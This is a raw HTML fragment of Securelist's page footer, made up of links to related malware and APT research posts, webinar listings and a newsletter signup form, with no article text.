href="https://securelist.com/category/research/" class="c-tag c-tag--primary">Research</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/" class="c-card__link">Threats in space (or rather, on Earth): internet-exposed GNSS receivers</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/isabelmanjarrez/" > <span>Isabel Manjarrez</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/11075744/ymir-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/11075744/ymir-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/" class="c-card__link">Ymir: new stealthy ransomware in the wild</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/cristiansouza/" > <span>Cristian Souza</span></a> </li> <li> <a href="https://securelist.com/author/ashleymunoz/" > <span>Ashley Muñoz</span></a> </li> <li> <a href="https://securelist.com/author/eduardoovalle/" > <span>Eduardo Ovalle</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/cloudcomputating-qsc-framework/114438/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/07083007/cloud-computating-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/07083007/cloud-computating-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/cloudcomputating-qsc-framework/114438/" class="c-card__link">QSC: A multi-plugin framework used by CloudComputating group in cyberespionage campaigns</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/saurabhsharma/" > <span>Saurabh Sharma</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/05093826/steelfox-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/05093826/steelfox-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/" class="c-card__link">New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/kirillkorchemny/" > <span>Kirill Korchemny</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal" data-element-id="latest-webinars-post-section"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Webinars</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/inside-the-dark-web-exploring-the-human-side-of-cybercriminals/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/10125625/cybercriminal-portrait-webinar-800x450.png" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/10125625/cybercriminal-portrait-webinar-800x450.png" data-srcset="" srcset="" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/threat-intelligence-and-incident-response/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Threat intelligence and IR</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-09-04T17:00:00+00:00" class="c-card__event-date"> 04 Sep 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/inside-the-dark-web-exploring-the-human-side-of-cybercriminals/" class="c-card__link" data-element-id="latest-webinars-post-title">Inside the Dark Web: exploring the human side of cybercriminals</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/annapavlovskaya/" data-element-id="latest-webinars-post-author"> <span>Anna Pavlovskaya</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/the-cybersecurity-buyers-dilemma-hype-vs-true-expertise/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/technologies-and-services/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Technologies and services</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-08-13T17:00:00+00:00" class="c-card__event-date"> 13 Aug 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/the-cybersecurity-buyers-dilemma-hype-vs-true-expertise/" class="c-card__link" data-element-id="latest-webinars-post-title">The Cybersecurity Buyer’s Dilemma: Hype vs (True) Expertise</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/oleggorobets/" data-element-id="latest-webinars-post-author"> <span>Oleg Gorobets</span></a> </li> <li> <a href="https://securelist.com/author/alexanderliskin/" data-element-id="latest-webinars-post-author"> <span>Alexander Liskin</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/cybersecuritys-human-factor-more-than-an-unpatched-vulnerability/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-07-16T17:00:00+00:00" class="c-card__event-date"> 16 Jul 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/cybersecuritys-human-factor-more-than-an-unpatched-vulnerability/" class="c-card__link" data-element-id="latest-webinars-post-title">Cybersecurity’s human factor – more than an unpatched vulnerability</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/oleggorobets/" data-element-id="latest-webinars-post-author"> <span>Oleg Gorobets</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/building-and-prioritizing-detection-engineering-backlogs-with-mitre-attck/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/trainings-and-workshops/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Trainings and workshops</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-07-09T16:00:00+00:00" class="c-card__event-date"> 09 Jul 2024, 4:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/building-and-prioritizing-detection-engineering-backlogs-with-mitre-attck/" class="c-card__link" data-element-id="latest-webinars-post-title">Building and prioritizing detection engineering backlogs with MITRE ATT&CK</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/andreytamoykin/" data-element-id="latest-webinars-post-author"> <span>Andrey Tamoykin</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section data-element-id="footer-reports-section" class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Reports</h5> <div class="o-row o-row--small-gutters"> <div class="o-col-8@sm"> <div class="o-row o-row--small-gutters"> <div class="o-col-6@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/sidewinder-apt/114089/" class="c-card__link">Beyond the Surface: the evolution and expansion of the SideWinder APT group</a></h3> </header> <div class="c-card__desc"> <p>Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post-exploitation tools and techniques.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/blindeagle-apt/113414/" class="c-card__link">BlindEagle flying high in Latin America</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Kaspersky shares insights into the activity and TTPs of the BlindEagle APT, which targets organizations and individuals in Colombia, Ecuador, Chile, Panama and other Latin American countries.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/eastwind-apt-campaign/113345/" class="c-card__link">EastWind campaign: new CloudSorcerer attacks on government organizations in Russia</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Kaspersky has identified a new EastWind campaign targeting Russian organizations and using CloudSorcerer as well as APT31 and APT27 tools.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/apt-trends-report-q2-2024/113275/" class="c-card__link">APT trends report Q2 2024</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>The report features the most significant developments relating to APT groups in Q2 2024, including the new backdoor in Linux utility XZ, a new RAT called SalmonQT, and hacktivist activity.</p> </div> </div> </article> </div> </div> </div> <div class="o-col-4@sm u-hidden u-block@sm"> <div class="c-image c-image--overflow-down@sm"> <a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/10091839/NEXT_370x500_EN.jpg" /></a> </div> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md" data-element-id="footer-subscribe-section"> <div class="o-container-fluid"> <div class="o-row c-block__row u-flex-nowrap@md"> <div class="o-col"> <div class="c-block__header"> <h5 class="c-block__title">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> </div> <div class="o-col u-flex-shrink-0 u-flex-grow"> <div class="c-form--newsletter u-ml-auto"> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1624711611' ><div id='gf_1624711611' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1624711611' id='gform_1624711611' class='subscribe-mc' action='/sidewinder-apt/114089/#gf_1624711611' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1624711611' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1624711611_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1624711611_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1624711611_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1624711611_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1624711611_11_2_1' /> <label for='choice_1624711611_11_2_1' id='label_1624711611_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button class="gform_button button" type="submit" id='gform_submit_button_1624711611' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large u-hidden u-inline-block@sm"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span class="u-hidden u-inline@sm">Subscribe</span> <span class="u-hidden@sm"><svg class="o-icon o-svg-icon o-svg-right"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-arrow"></use></svg></span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&title=&description=&tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1624711611_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1624711611_11' value='1' /> <input type='hidden' name='gform_random_id' value='1624711611' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_3" name="ak_js" value="43"/><script>document.getElementById( "ak_js_3" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1624711611' id='gform_ajax_frame_1624711611' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1624711611, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1624711611').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1624711611');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1624711611').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1624711611').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1624711611').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1624711611').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1624711611').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1624711611_11').val();gformInitSpinner( 1624711611, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1624711611, current_page]);window['gf_submitting_1624711611'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1624711611').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1624711611').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1624711611]);window['gf_submitting_1624711611'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1624711611').text());}, 50);}else{jQuery('#gform_1624711611').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1624711611, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="u-hidden@sm u-mb-spacer-base-"> <div class="c-image c-image--overflow-down@sm"> <a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/28092440/NEXT_banner_1080x1080-740x740.jpg" /></a> </div> </div> </div> </section> </div><!-- /.c-page --> <section class="c-block c-block--spacing-t-small c-block--spacing-t-large@md c-block--spacing-b c-page-footer c-block--bg-image c-color--invert" style="background-image: url(https://securelist.com/wp-content/themes/securelist2020/assets/images/content/bg-gradient-02.jpg);"> <div class="o-container-fluid"> <div data-element-id="footer-content-block" class="c-page-footer__content"> <div class="o-row o-row--reverse"> <div class="o-col-9@md"> <div class="c-page-menu"> <div class="o-row c-page-menu__dividers"> <div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p class="menu-item-threats section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/threat-categories/" data-element-id="footer-content-link">Threats</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Threats</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99839"><a href="https://securelist.com/threat-category/apt-targeted-attacks/" data-element-id="footer-content-link">APT (Targeted attacks)</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89457"><a href="https://securelist.com/threat-category/secure-environment/" data-element-id="footer-content-link">Secure environment (IoT)</a></li> <li class="topic-item vulnerabilities menu-item menu-item-type-custom menu-item-object-custom menu-item-63231"><a href="https://securelist.com/threat-category/mobile-threats/" data-element-id="footer-content-link">Mobile threats</a></li> <li class="topic-item detected menu-item menu-item-type-custom menu-item-object-custom menu-item-63229"><a href="https://securelist.com/threat-category/financial-threats/" data-element-id="footer-content-link">Financial threats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89458"><a href="https://securelist.com/threat-category/spam-and-phishing/" data-element-id="footer-content-link">Spam and phishing</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-99840"><a href="https://securelist.com/threat-category/industrial-threats/" data-element-id="footer-content-link">Industrial threats</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89465"><a href="https://securelist.com/threat-category/web-threats/" data-element-id="footer-content-link">Web threats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89459"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/" data-element-id="footer-content-link">Vulnerabilities and exploits</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113855"><a href="https://securelist.com/threat-categories/" data-element-id="footer-content-link">All threats</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p class="menu-item-categories section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/categories/" data-element-id="footer-content-link">Categories</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Categories</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-84158"><a href="https://securelist.com/category/apt-reports/" data-element-id="footer-content-link">APT reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99841"><a href="https://securelist.com/category/malware-descriptions/" data-element-id="footer-content-link">Malware descriptions</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84160"><a href="https://securelist.com/category/kaspersky-security-bulletin/" data-element-id="footer-content-link">Security Bulletin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84161"><a href="https://securelist.com/category/malware-reports/" data-element-id="footer-content-link">Malware reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89460"><a href="https://securelist.com/category/spam-and-phishing-reports/" data-element-id="footer-content-link">Spam and phishing reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99842"><a href="https://securelist.com/category/security-technologies/" data-element-id="footer-content-link">Security technologies</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84165"><a href="https://securelist.com/category/research/" data-element-id="footer-content-link">Research</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84164"><a href="https://securelist.com/category/publications/" data-element-id="footer-content-link">Publications</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113876"><a href="https://securelist.com/categories/" data-element-id="footer-content-link">All categories</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><p class="menu-item-tags section-title after-accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-277 c-page-menu__title u-hidden u-block@md"><a data-element-id="footer-content-link">Other sections</a></p> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100526"><a href="https://securelist.com/all/" data-element-id="footer-content-link">Archive</a></li> <li class="show-all-tags menu-item menu-item-type-post_type menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="footer-content-link">All tags</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="footer-content-link">Webinars</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">APT Logbook</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Statistics</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Encyclopedia</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Threats descriptions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-111312"><a href="https://securelist.com/ksb-2023/" data-element-id="footer-content-link">KSB 2023</a></li> </ul> </li> </div> </div> </div> </div> <div class="o-col-3@md"> <div class="c-site-logo c-site-logo--kaspersky"></div> </div> </div> </div> <div data-element-id="footer-menu-block" class="c-page-footer__wrapper"> <div class="c-page-footer__info"> <p>© 2024 AO Kaspersky Lab. All Rights Reserved.<br /> Registered trademarks and service marks are the property of their respective owners.</p> </div> <div class="c-page-footer__links"> <ul> <li><a data-element-id="footer-menu-link" href="https://www.kaspersky.com/web-privacy-policy?icid=gl_seclistfooter_acq_ona_smm__onl_b2b_securelist_footer_sm-team_______11d7a8212d94123d">Privacy Policy</a></li> <li><a data-element-id="footer-menu-link" 